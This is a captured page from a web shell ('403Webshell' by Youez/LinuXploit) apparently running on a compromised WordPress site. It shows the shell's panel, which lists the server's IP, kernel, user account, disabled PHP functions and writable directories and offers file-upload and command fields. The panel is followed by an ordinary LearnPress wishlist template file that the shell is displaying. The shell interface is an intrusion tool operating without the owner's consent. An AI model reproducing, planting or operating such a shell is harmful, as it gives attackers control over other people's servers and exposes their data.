403Webshell
Server IP : 104.21.28.229  /  Your IP : 216.73.216.142
Web Server : Apache/2
System : Linux hosting8537.lvs 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : mienphi ( 1014)
PHP Version : 8.2.14
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/mienphi/public_html/wp-content/themes/eduma/learnpress-v4/addons/wishlist/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mienphi/public_html/wp-content/themes/eduma/learnpress-v4/addons/wishlist/user-wishlist.php
<?php
/**
 * Template for displaying the list of course is in wishlist
 *
 * @author ThimPress
 */

defined( 'ABSPATH' ) || exit();

global $post;

$has_courses = $wishlist ? true : false;
?>
<div id="learn-press-profile-tab-course-wishlist" class="<?php echo $has_courses ? 'has-courses' : '';?>">

<?php if ( $has_courses ) : ?>

	<h3 class="box-title"><?php esc_html_e( 'Favorite Courses', 'eduma' ); ?></h3>

	<div class="thim-carousel-wrapper thim-course-carousel thim-course-grid" data-visible="3" data-pagination="0" data-navigation="1">

		<?php foreach( $wishlist as $post ) { ?>

			<?php LP_Addon_Wishlist_Preload::$addon->get_template( 'wishlist-content.php' ); ?>

		<?php } ?>
	</div>

<?php else: ?>

	<?php learn_press_display_message( apply_filters( 'learn_press_wishlist_empty_course', esc_html__( 'No records.', 'eduma' ) ), 'notice' ); ?>

<?php endif; ?>

</div>

<?php
wp_reset_postdata();

Youez - 2016 - github.com/yon3zu
LinuXploit